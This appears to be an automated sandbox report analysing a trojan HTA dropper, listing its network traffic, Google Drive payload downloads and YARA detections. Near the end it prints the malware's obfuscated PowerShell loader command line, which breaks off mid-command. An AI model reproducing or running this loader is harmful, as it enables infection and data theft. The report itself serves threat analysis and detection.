Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: orden_0099896754537687897657436786756785654576.hta |
Virustotal: Detection: 8% |
Source: unknown |
HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49699 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49700 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49710 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49711 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.1525931065.000000000810E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbU source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: Joe Sandbox View |
IP Address: 208.95.112.1 208.95.112.1 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: unknown |
DNS query: name: ip-api.com |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
DNS traffic detected: queries for: drive.google.com |
Source: svchost.exe, 00000004.00000002.2413923989.000001BF45E00000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatbXRhj |
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download |
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C99000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/Prod1C: |
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C: |
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004AAC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: amsi32_6504.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\SysWOW64\mshta.exe |
Process created: Commandline size = 6335 |
|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6335 |
|
Source: C:\Windows\System32\svchost.exe |
File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_00CBFB98 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_00CBF850 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248ACF38 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248A4A80 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248A3E68 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248A41B0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_271A9B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_271A1808 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_271A3080 |
Source: C:\Windows\SysWOW64\mshta.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE |
Source: amsi32_6504.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winHTA@13/11@3/4 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Roaming\Ponos.Lsi |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltlxalh1.220.ps1 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1224 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6504 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\mshta.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\orden_0099896754537687897657436786756785654576.hta" |
|
Source: C:\Windows\SysWOW64\mshta.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr s |